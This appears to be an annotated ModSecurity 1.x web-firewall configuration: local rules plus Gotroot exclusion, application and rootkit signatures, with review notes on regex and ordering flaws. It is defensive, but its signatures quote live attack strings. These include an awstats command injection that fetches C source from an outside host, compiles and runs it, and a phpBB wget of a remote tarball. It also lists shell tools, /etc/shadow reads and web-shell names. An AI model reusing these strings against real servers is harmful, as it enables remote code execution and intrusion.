# ModSecurity 1.x request filters (SecFilter / SecFilterSelective syntax).
# Every pattern is a regular expression. A rule with no action list uses
# whatever SecFilterDefaultAction is in effect; that directive is not set in
# the visible part of this file.

# referer spam common sites
# Matches a Referer header that contains one of these redirector domains.
SecFilterSelective "HTTP_REFERER" "(go\.to|get\.to|drop\.to|hey\.to|switch\.to|dive\.to|move\.to|again\.at)"

# phpbb exploits
# NOTE(review): the parentheses in the two chr(...) patterns are unescaped, so
# the regex reads them as groups and matches "chr101%252echr99..." rather than
# the literal text "chr(101)...". The viewtopic rule further down escapes them
# as chr\( ... \). Confirm which form was intended.
# NOTE(review): these signatures are written against the percent-encoded
# request text; they only fire if the engine compares THE_REQUEST before
# URL-decoding. Confirm against the deployed ModSecurity version.
SecFilterSelective THE_REQUEST "chr(101)%252echr(99)%252echr(104)"
SecFilterSelective THE_REQUEST "chr(99)%252echr(100)%252echr(32)"
SecFilterSelective THE_REQUEST "wget%20www.geocities.com/supahacker/bz.tgz"
# Directory traversal to /tmp in the install_to parameter.
SecFilterSelective THE_REQUEST "addnew&install_to=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./tmp"

# awstats exploit
# Exact-string signature for one observed configdir= command injection.
# NOTE(review): the pattern contains a literal space in "echo %20e_exp", which
# looks like a line-wrap artifact; as written it only matches a request that
# carries that exact space. Verify against the upstream rule.
SecFilterSelective THE_REQUEST "configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20http%3a%2f%2fawsimple%2etripod%2ecom%2fm%2ftest%2ec%3bgcc%20%2do%20nfsiod%20test%2ec%3b%2e%2fnfsiod%3becho %20e_exp%3b%2500"
# Shorter signature: configdir= followed by an encoded space and pipe.
SecFilterSelective THE_REQUEST "configdir=%20%7c"

# Protect against phpBB2 Exploits
# Chained pair: fires only when the request contains "viewtopic.php?" AND a
# chr(N) call with a 1-3 digit argument; the match is denied and logged.
SecFilter "viewtopic\.php\?" chain
SecFilter "chr\(([0-9]{1,3})\)" "deny,log"
# User-Agent string sent by a known exploit script.
SecFilterSelective HTTP_USER_AGENT "phpBB2 exploit"

# Exploit phpBB Highlighting Code Execution Attempt
SecFilterSelective THE_REQUEST "&highlight='\.system\("

# Exploit phpBB Highlighting SQL Injection
SecFilterSelective THE_REQUEST "&highlight='\.mysql_query\("

# Exploit phpBB Highlighting Code Execution - Santy.A Worm
SecFilterSelective THE_REQUEST "&highlight='\.fwrite\(fopen\("

# Exploit phpBB Highlight Exploit Attempt
# Matches the text %27 (an encoded single quote) inside the "highlight"
# argument. NOTE(review): if argument values are URL-decoded before matching,
# the literal "%27" would only be seen for double-encoded input - confirm.
SecFilterSelective ARG_highlight %27

# Common web exploit
# Exact command strings (including their spacing) seen in cmd= parameters.
SecFilterSelective THE_REQUEST "cmd=cd /var/tmp;wget "
SecFilterSelective THE_REQUEST "cmd=cd /tmp; wget "
SecFilterSelective THE_REQUEST "cmd=cd /var/tmp;ls;wget "

#Specific XML-RPC attacks on xmlrpc.php
# Three-link chain: the request line names /xmlrpc.php, the request contains
# "xml", and it contains one of the listed PHP calls followed by ");".
# NOTE(review): the "*" after "\<" allows zero repetitions, so the second link
# matches any occurrence of "xml", with or without a leading "<".
# NOTE(review): "posix_ kill" in the list below contains a space and so does
# not match "posix_kill"; probably a wrap artifact - verify against upstream.
SecFilterSelective THE_REQUEST "/xmlrpc\.php" chain
SecFilter "\<*xml" chain
SecFilter "(echo( |\(|\').*\;|chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_ kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;"

# block common phish site URLs
# Path fragments used by phishing kits hosted on compromised accounts; a
# request line containing any of them is matched.
# The dots in these patterns are unescaped and therefore match any character,
# which only widens the match slightly.
SecFilterSelective THE_REQUEST "aw/eBayISAPI"
SecFilterSelective THE_REQUEST "paypal-login"
SecFilterSelective THE_REQUEST "paypalmembers"
SecFilterSelective THE_REQUEST "paypal.cgi-bin"
SecFilterSelective THE_REQUEST "secure.cgi.paypal.com"
SecFilterSelective THE_REQUEST "wellsfargo.cgi.bin"
SecFilterSelective THE_REQUEST "cgibin-webscr"
SecFilterSelective THE_REQUEST "signin.ebay.com"

# spammer bcc header injections
# Matches any POST body with "bcc:" followed later by "@". This is broad:
# a legitimate form post that mentions a Bcc address matches as well.
# POST_PAYLOAD is only available when request-body scanning is enabled
# (SecFilterScanPOST), which is not shown in this part of the file.
SecFilterSelective POST_PAYLOAD "bcc:.*@.*"

# Third-party rule sets, loaded in this order: exclusions, rootkit
# signatures, generic application rules.
# NOTE(review): the exclusion file's own header (below) says it must be loaded
# first, yet the local rules above are evaluated before this Include. Confirm
# that ordering is intended.
Include /dh/apache2/template/etc/mod_sec_gotroot_exclude.conf
Include /dh/apache2/template/etc/mod_sec_gotroot_rootkits.conf
Include /dh/apache2/template/etc/mod_sec_gotroot_generic.conf

# http://www.gotroot.com/mod_security+rules
# Gotroot.com ModSecurity rules
#
# Created by The Prometheus Group (http://www.prometheus-group.com)
#
# Exclusion Rules
#
# Download from: http://www.gotroot.com/downloads/ftp/mod_security/exclude.conf
# Copyright 2005, all rights reserved.
#
# Commercial redistribution prohibited.
#
# IMPORTANT NOTE! These rules must be loaded FIRST in your rule orderset to override
# other rules. If you load them later, they will not work!
#
# Version: N-20050905-01
###########################################
#Generic SQL injection rule exclusions
###########################################
# Each rule below matches SQL-looking text (a statement keyword, an
# identifier list, then from/into/table/...) and applies "pass,nolog".
# NOTE(review): all seven rules carry the same regular expression. The
# per-application labels suggest each one was originally scoped to a
# container (Location/Directory) that is not visible here; unscoped, they are
# duplicates. Verify against the upstream exclude.conf.
# NOTE(review): as far as the ModSecurity 1.x documentation goes, "pass" lets
# the request continue to the next rule and "allow" is the action that stops
# rule processing. If so, an unscoped "pass,nolog" rule does not exempt the
# request from later SQL-injection rules - confirm.
# NOTE(review): inside a bracket expression "|" is a literal character, so
# [A-Z|a-z|0-9|\*| |\,] also accepts the pipe character.

#generic PHP forum posting exclusion
SecFilter "[[:space:]]+(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]" pass,nolog

#PhpBB posting
SecFilter "[[:space:]]+(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]" pass,nolog

#Postnuke uploads
SecFilter "[[:space:]]+(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]" pass,nolog

#Squirrel mail and Horde postings
SecFilter "[[:space:]]+(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]" pass,nolog

#Phorum posting
# The two POST_PAYLOAD rules look only at the request body; the final
# SecFilter applies the same pattern to the request as a whole.
SecFilterSelective POST_PAYLOAD "[[:space:]]+(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]" pass,nolog
SecFilterSelective POST_PAYLOAD "[[:space:]]+(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]" pass,nolog
SecFilter "[[:space:]]+(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]" pass,nolog
###########################################
#Double pipe exclusion rules
###########################################
# Same pattern as the "generic command line attack" rule in the application
# rule set, here with "pass,nolog" instead of the default action.
SecFilterSelective THE_REQUEST "\|+.*[\x20].*[\x20].*\|" pass,nolog

###########################################
#Front page exclusions
###########################################
# NOTE(review): SecFilterInheritance Off stops a configuration context from
# inheriting its parent's filters and is normally placed inside a container
# (Directory/Location). No container is visible here; presumably the upstream
# file wrapped it in one for the FrontPage paths. Verify, because its effect
# at this level is not what the heading describes.
SecFilterInheritance Off

# http://www.gotroot.com/mod_security+rules
# Gotroot.com ModSecurity rules
#
# Created by The Prometheus Group (http://www.prometheus-group.com)
#
# Application Security Rules
#
# Download from: http://www.gotroot.com/downloads/ftp/mod_security/rules.conf
# Copyright 2005, all rights reserved.
#
# Commercial redistribution prohibited.
#
# Version: N-20051120-01
#--------------------------------
# notes
#--------------------------------
#--------------------------------
#start rules
#--------------------------------

#Enforce proper HTTP requests
# The leading "!" inverts the match: the rule fires when the request line does
# NOT end in HTTP/0.9, HTTP/1.0 or HTTP/1.1.
SecFilterSelective THE_REQUEST "!HTTP\/(0\.9|1\.0|1\.1)$"

# Only accept request encodings we know how to handle
# we exclude GET requests from this because some (automated)
# clients supply "text/html" as Content-Type
# DreamHost added REPORT for subversion on Apache 2 only
# NOTE(review): as written the chain fires only when the method is NOT one of
# the listed verbs AND the Content-Type is something other than empty,
# urlencoded or multipart. POST is in the listed set, so a POST with any other
# Content-Type is not rejected here, and an unlisted method with an empty or
# accepted Content-Type is not rejected either. If the intent is the one the
# comment above describes (exempt GET/HEAD, check everything else), the method
# list is too wide - confirm.
SecFilterSelective REQUEST_METHOD "!^(GET|HEAD|POST|PUT|PROPFIND|OPTIONS|LOCK|REPORT)$" chain
SecFilterSelective HTTP_Content-Type "!(^$|^application/x-www-form-urlencoded$|^multipart/form-data)"

# Require Content-Length to be provided with
# every POST request
# Chain: method is exactly POST and the Content-Length header is empty.
SecFilterSelective REQUEST_METHOD "^POST$" chain
SecFilterSelective HTTP_Content-Length "^$"

# Don't accept transfer encodings we know we don't handle
# (and you don't need it anyway)
# Fires on any request that carries a non-empty Transfer-Encoding header.
SecFilterSelective HTTP_Transfer-Encoding "!^$"

#XSS insertion into Content-Type
# NOTE(review): THE_REQUEST is the request line, so this sees "Content-Type:"
# text only when it appears in the URL itself, not the real header -
# presumably aimed at header text smuggled into the request line; confirm.
SecFilterSelective THE_REQUEST "Content-Type\:.*(<[[:space:]]*(script|about|applet|activex|chrome)*>.*(script|about|applet|activex|chrome)[[:space:]]*>|onmouseover=|javascript\:)"

#Don't accept chunked encodings
#modsecurity can not look at these, so this is a hole
#that can bypass your rules, the rule before this one
#should cover this, but hey paranoia is cheap
# Rejects requests whose Transfer-Encoding header contains "chunked". Chunked
# bodies are called out because the filter cannot inspect them, so they would
# otherwise bypass every body-based rule in this file.
SecFilterSelective HTTP_Transfer-Encoding "chunked"

# The next three rules match a request line whose target is an absolute
# http/https/ftp URL, i.e. an attempt to use this server as a forward proxy.
#Web Proxy GET Request
SecFilter "^GET (http|https|ftp)\:/"

#Web Proxy HEAD Request
SecFilter "^HEAD (http|https|ftp)\:/"

#Proxy POST Request
SecFilter "^POST (http|https|ftp)\:/"

#Generic PHP exploit signatures
# ";" followed by one of the listed PHP function names, an argument list and
# a closing ";" in the request line.
SecFilterSelective THE_REQUEST "\;(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;"

#slightly tighter rules with narrower focus
# Same function list without the leading ";", applied to the URI and to the
# POST body separately. The names are unanchored, so "exec(" also matches
# inside longer identifiers that end in one of these names.
SecFilterSelective REQUEST_URI "(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;"
SecFilterSelective POST_PAYLOAD "(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;"

#prevent PHP error leakage
# Matches response bodies containing PHP's "Fatal error:" banner. The OUTPUT
# location is only evaluated when output scanning is enabled
# (SecFilterScanOutput), which is not shown in this part of the file.
SecFilterSelective OUTPUT "Fatal error:"

#generic XSS PHP attack types
# Chain: request line names a .php script with a query string AND the request
# contains one of two javascript: payload shapes.
# NOTE(review): "body.\innerHTML" reads as any-character followed by an
# escaped "i"; the second occurrence is written "body\.innerHTML", so the
# backslash and dot look transposed. Confirm against upstream.
SecFilterSelective THE_REQUEST "\.php\?" chain
SecFilter "javascript\:/(.*new\x20ActiveXObject.*Sh\.regwrite|.*window\.opener\.document\.body.\innerHTML=window\.opener\.document\.body\.innerHTML\.replace)"

#Prevent SQL injection in cookies
# SQL statement shape (keyword, identifiers, from/into/...) or a quoted
# UNION SELECT ... INTO ... FROM sequence inside any cookie value.
SecFilterSelective COOKIE_VALUES "((select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]|UNION SELECT.*\'.*\'.*,[0-9].*INTO.*FROM)"

#Generic command line attack filter
# A pipe, at least two spaces somewhere after it, then another pipe.
SecFilterSelective THE_REQUEST "\|+.*[\x20].*[\x20].*\|"

#PHP Injection Attack generic signature
# Chain: a PHP script in the request line AND either a path-like parameter
# set to a remote http/https/ftp URL or a cmd=/command= parameter that starts
# with a shell command.
# NOTE(review): in "\.php*" the "*" applies to the last "p" only, so the first
# link matches ".ph" followed by anything (for example .phtml).
# NOTE(review): entries without a trailing space (cd, id, cmd, pwd, uname,
# whoami) match as prefixes, so a value such as "command=identify" also fires.
SecFilterSelective THE_REQUEST "\.php*" chain
SecFilter "(\?((LOCAL|INCLUDE|PEAR|SQUIZLIB)_PATH|action|content|dir|name|menu|pm_path|path|pathtoroot|pagina|path|include_location|root|page|gorumDir|site|pun_root|open|seite)=(http|https|ftp)\:/|(cmd|command)=(cd|\;|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |id|cmd|pwd|wget |uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |\./|whoami|killall |rm \-[a-z|A-Z]))"
# Single-rule form of the same signature, anchored on ".php?" in the request
# line.
SecFilterSelective THE_REQUEST "\.php\?(((LOCAL|INCLUDE|PEAR|SQUIZLIB)_PATH|action|content|dir|name|menu|pm_path|pagina|path|pathtoroot|include_location|gorumDir|root|page|site|pun_root|open|seite)=(http|https|ftp)\:/|.*(cmd|command)=(cd|\;|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |id|uname |cvs |svn |(s|r)(cp|sh) |net(stat|cat)|rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z|A-Z]))"

#Generic PHP remote file inclusion attack signature
# Two three-link chains: ".php?" in the request line, a remote URL scheme
# anywhere in the request, and a cmd=/command= parameter carrying a shell
# command. The second chain allows arbitrary text between "=" and the command.
SecFilterSelective THE_REQUEST "\.php\?" chain
SecFilter "(http|https|ftp)\:/" chain
SecFilter "(cmd|command)=(cd|\;|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |id|uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z|A-Z])"
SecFilterSelective THE_REQUEST "\.php\?" chain
SecFilter "(http|https|ftp)\:/" chain
SecFilter "(cmd|command)=.*(cd|\;|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |id|uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z|A-Z])"

#Generic PHP body attack
# Chain: one of the PHP function names appears in the request line AND the
# POST body begins with "PHP", optional colons, then a shell command.
SecFilterSelective THE_REQUEST "(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)" chain
SecFilterSelective POST_PAYLOAD "^PHP\:*((cd|mkdir)[[:space:]]+(/|[A-Z|a-z|0-9]|\.)*|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |id|uname |cvs |svn |(s|r)(cp|sh) |net(stat|cat)|rexec |smbclient |t?ftp |ncftp |chmod |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z|A-Z])"

#script, perl, etc. code in HTTP_Referer string
# A "#!" interpreter line followed by a path inside the Referer header.
SecFilterSelective HTTP_Referer "\#\!.*/"

#generic command line attack
# NOTE(review): "\|*" and "o*" each repeat a single character, so the pattern
# is "id;ech", any number of "o", then "|"; there is no wildcard between
# "echo" and the closing pipe. If ".*" was intended, text after "echo" makes
# the rule miss - confirm.
SecFilterSelective THE_REQUEST "\|*id\;echo*\|"
SecFilterSelective ARGS "\|*id\;echo*\|"

#remote file inclusion generic attack signature
# Data/image/text file names that are given a query string carrying a remote
# URL or a cmd=/command=/inc= parameter, as a request target or as an
# argument value.
SecFilterSelective THE_REQUEST "\.(dat|gif|jpg|png|bmp|txt|vir|dot)\?" chain
SecFilter "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)"
SecFilterSelective THE_REQUEST "\.(dat|gif|jpg|png|bmp|txt|vir|dot)\?\&(cmd|command|inc|name)="
SecFilterSelective ARGS "\.(dat|gif|jpg|png|bmp|txt|vir|dot)" chain
SecFilter "\?\&(cmd|inc|name)="
SecFilterSelective ARGS "\.(dat|gif|jpg|png|bmp|txt|vir|dot)\?\&(cmd|inc|name)="
SecFilterSelective REQUEST_URI "\.php\?.*=(http|https|ftp)\:/.*\?&cmd="

#Bogus file extensions generic signature
# An image extension followed by ".txt" (for example name.gif.txt).
SecFilterSelective THE_REQUEST "[A-Za-z0-9]\.(gif|jpg|png|bmp)\.txt"

#PHP remote path attack generic signature
# The second pattern (".php" then "path=<remote URL>") already covers
# everything the first one matches.
SecFilterSelective REQUEST_URI "\.ph(p(3|4)?).*path=(http|https|ftp)\:/"
SecFilterSelective REQUEST_URI "\.php.*path=(http|https|ftp)\:/"

#generic attack sig
# "cd", optional spaces, ";" and then another shell command.
SecFilterSelective THE_REQUEST "cd\x20*\;(cd|\;|echo|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |id|uname |cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |\./)"

# WEB-ATTACKS uname -a command attempt
# NOTE(review): "uname" is unanchored, so it also matches inside words such as
# "username"; combined with " -a" anywhere in the request this can flag
# ordinary login or search traffic.
SecFilterSelective THE_REQUEST "uname" chain
SecFilter "\x20-a"

#generic php attack sigs
SecFilterSelective REQUEST_URI "&(cmd|command)=(id|uname)\x20"
SecFilterSelective REQUEST_URI "cmd\?(cmd|command)="
SecFilterSelective REQUEST_URI "(spy|cmd|cmd_out|sh)\.(gif|jpg|png|bmp|txt)\?&(cmd|command)="
SecFilterSelective REQUEST_URI "\.php\?&(cmd|command)="

#Generic PHP attack sig
SecFilterSelective THE_REQUEST "system\(getenv\(HTTP_PHP\)\)"

# WEB-ATTACKS /etc/shadow access
SecFilterSelective THE_REQUEST "/etc/shadow"

#remote bash shell
SecFilterSelective THE_REQUEST "/shell\.php\&cmd="
SecFilterSelective ARGS "/shell\.php\&cmd="

#Generic PHP payload command injection and upload vulnerabilities
# Chain: the POST body contains a PHP open tag, the request contains one of
# the listed file/socket/exec call shapes, and the open tag is seen again by
# the final, unscoped link.
SecFilterSelective POST_PAYLOAD "<\?php" chain
SecFilter "((fputs|fread)\(.*\,.*\)\;|fsockopen\(gethostbyname|chr\(.*\)\.chr\(.*\)\.chr\(|(fclose|fgets)\(.*\)\;|(system|exec)\(.*\)\;)" chain
SecFilter "\<\?php"
#http://www.gotroot.com/mod_security+rules
#
# Created by The Prometheus Group (http://www.prometheus-group.com)
#
#Known rootkit, remote toolkit, etc. signature
#
#Download from: http://www.gotroot.com/downloads/ftp/mod_security/rootkits.conf
#copyright 2005, all rights reserved
#
# Commercial redistribution prohibited.
#
#Version: N-20051120-01
#
#http://www.gotroot.com
#see website for more information

# File-name signatures for remotely included command scripts. Each rule
# matches the request line; none sets an action, so the configured default
# action applies. Most require an image/text extension followed by "?", i.e.
# a static-looking file that is being passed a query string.
# These are name-based indicators only: a renamed script is not matched, and
# a legitimate file that happens to share a name is.
SecFilterSelective THE_REQUEST "/cse\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/terminatorX-exp.*\.(gif|jpg|txt|bmp|php)\?"
SecFilterSelective THE_REQUEST "/\.it/viewde"
SecFilterSelective THE_REQUEST "/cmd\?&(command|cmd)="
SecFilterSelective THE_REQUEST "/cmd\.php\.ns\?&(command|cmd)="
SecFilterSelective THE_REQUEST "/cmd\.dat\?&(command|cmd)="
SecFilterSelective THE_REQUEST "/sep\.txt\?&(command|cmd)="
SecFilterSelective THE_REQUEST "/s\.txt\?&(cmd|command)="
SecFilterSelective THE_REQUEST "/pro18\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/shell\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/bash\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/(o|0|p)wn(e|3)d\.(gif|jpg|txt|bmp)\?&(cmd|command)="
SecFilterSelective THE_REQUEST "/get\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/root\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/spy\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/nmap\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/asc\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/lila\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/sh\.(gif|jpg|txt|bmp)\?"
# Variants of cmd/command with a "new" prefix, a one-letter prefix and/or a
# one-digit suffix.
SecFilterSelective THE_REQUEST "/new(cmd|command)\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/(cmd|command)\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/(cmd|command)[0-9]\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/[a-z](cmd|command)\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/[a-z](cmd|command)[0-9]\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/ijoo\.(gif|jpg|txt|bmp)\?"
# Further file-name signatures for remotely included command scripts,
# matched against the request line.
SecFilterSelective THE_REQUEST "/oinc\.(gif|jpg|txt|bmp)\?"
# NOTE(review): this one is very short - any file named a.gif/a.jpg/a.txt/
# a.bmp requested with a query string matches (cache-busting "?v=..." URLs
# included). Expect false positives.
SecFilterSelective THE_REQUEST "/a\.(gif|jpg|txt|bmp)\?"
# PHP shells saved under image-like or generic names (.php, .php3, .php4,
# .phtml) and called with a query string.
SecFilterSelective THE_REQUEST "/gif\.ph(p(3|4)?|tml)\?"
SecFilterSelective THE_REQUEST "/jpg\.ph(p(3|4)?|tml)\?"
SecFilterSelective THE_REQUEST "/ion\.ph(p(3|4)?|tml)\?"
SecFilterSelective THE_REQUEST "/lala\.ph(p(3|4)?|tml)\?"
SecFilterSelective THE_REQUEST "/phpshell\.ph(p(3|4)?|tml)\?"
SecFilterSelective THE_REQUEST "/tool[12][05]\.ph(p(3|4)?|tml)\?"
SecFilterSelective THE_REQUEST "/tool[12]\.ph(p(3|4)?|tml)\?"
# tool25.js is already covered by the bracket-class rule before it.
SecFilterSelective THE_REQUEST "/tool[12][0-9]\.js"
SecFilterSelective THE_REQUEST "/tool25\.js"

#Known rootkits
# Command strings and file names associated with specific kits.
SecFilterSelective THE_REQUEST "perl xpl\.pl"
SecFilterSelective THE_REQUEST "perl kut"
SecFilterSelective THE_REQUEST "perl viewde"
SecFilterSelective THE_REQUEST "perl httpd\.txt"
SecFilterSelective THE_REQUEST "\./xkernel\;"
SecFilterSelective THE_REQUEST "/kaiten\.c"
SecFilterSelective THE_REQUEST "/mampus\?&(cmd|command)"

#Known rootkit Defacing Tool 2.0
# NOTE(review): "(12)" is a group that matches the literal text "12", unlike
# the bracket class "[12]" used in the .php/.js rules above, so "tool(12)"
# matches "tool12" only, not "tool1"/"tool2". Confirm which was meant.
# NOTE(review): "d(ao)t" matches only "daot". If ".dat"/".dot" were intended
# ("d(a|o)t"), those extensions are currently caught only by the explicit
# "/tool25\.dat\?" rule at the end of this group.
SecFilterSelective THE_REQUEST "/tool(12)[0-9]\.(d(ao)t|gif|jpg|bmp|txt)\?&(cmd|command)="
SecFilterSelective THE_REQUEST "/tool\.(d(ao)t|gif|jpg|bmp|txt)\?&(cmd|command)="
SecFilterSelective THE_REQUEST "/tool25\.(d(ao)t|gif|jpg|bmp|txt)\?&(cmd|command)="
SecFilterSelective THE_REQUEST "/tool(12)\.(d(ao)t|gif|jpg|bmp|txt)\?&(cmd|command)="
SecFilterSelective THE_REQUEST "/therules25\.(d(ao)t|gif|jpg|bmp|txt)\?(cmd|command)="
SecFilterSelective THE_REQUEST "/tool25\.jpg\?"
SecFilterSelective THE_REQUEST "/tool25\.dat\?"
#other known tools
# File-name signatures matched against the request line; the default action
# applies because no rule sets its own.
SecFilterSelective THE_REQUEST "/xpl\.php\?&(cmd|command)="
SecFilterSelective THE_REQUEST "/ssh\.php"
SecFilterSelective THE_REQUEST "/ssh2\.php"
SecFilterSelective THE_REQUEST "/sfdg2\.php"

#New kit
# Files named bash or httpd under a hidden ".dump" directory, with or without
# an extension.
SecFilterSelective THE_REQUEST "/\.dump/(bash|httpd)(\;|\w)"
SecFilterSelective THE_REQUEST "/\.dump/(bash|httpd)\.(txt|php|gif|jpg|dat|bmp|png)(\;|\w)"

#new kit
SecFilterSelective THE_REQUEST "/dblib\.php\?&(cmd|command)="

#suntzu
SecFilterSelective THE_REQUEST "/suntzu\.php\?cmd="

#proxysx.gif?
SecFilterSelective THE_REQUEST "/proxysx\.(gif|jpg|bmp|txt)\?"

#phpbackdoor
# The second pattern (with ".*") already covers the first.
SecFilterSelective THE_REQUEST "/phpbackdoor\.php\?cmd="
SecFilterSelective THE_REQUEST "/phpbackdoor.*\.php\?cmd="

#new unknown kit
# NOTE(review): the "?" here is unescaped, so it makes the "s" optional: the
# pattern matches "/oop&" or "/oops&", not "/oops?&". Every other rule in this
# file that means a literal question mark writes "\?".
SecFilterSelective REQUEST_URI "/oops?&"

# known PHP attack shells
#value of these sigs, pretty low, but here to catch
# any loose threads, honeypotting, etc.
# NOTE(review): in the first pattern the alternation is
# (php(3|4)?|tml|cgi|sh), so it matches ".tml" rather than ".phtml"; the rules
# below use "ph(p(3|4)?|tml)" for that. Confirm.
SecFilterSelective THE_REQUEST "/img/wiki_up/.*\.(php(3|4)?|tml|cgi|sh)"
SecFilterSelective THE_REQUEST "wiki_up/gif\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST "wiki_up/ion\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST "wiki_up/jpg\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST "wiki_up/lala\.ph(p(3|4)?|tml)"
# Catch-all for any PHP file under wiki_up/; it subsumes the four named
# wiki_up rules above.
SecFilterSelective THE_REQUEST "wiki_up/.*\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST "/phpshell\.ph(p(3|4)?|tml)"
# The tool20 rule appears twice with identical text.
SecFilterSelective THE_REQUEST "/tool20\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST "/tool20\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST "/temp/gif\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST "/temp/lala\.ph(p(3|4)?|tml)"
SecFilterSelective REQUEST_URI "/phpterm"

#new unknown kits
SecFilterSelective THE_REQUEST "/iblis\.htm\?"
SecFilterSelective THE_REQUEST "/gif\.gif\?"
SecFilterSelective THE_REQUEST "/go\.php\.txt\?"
SecFilterSelective THE_REQUEST "/sh[0-9]\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/iys\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/shell[0-9]\.(gif|jpg|txt|bmp)\?"
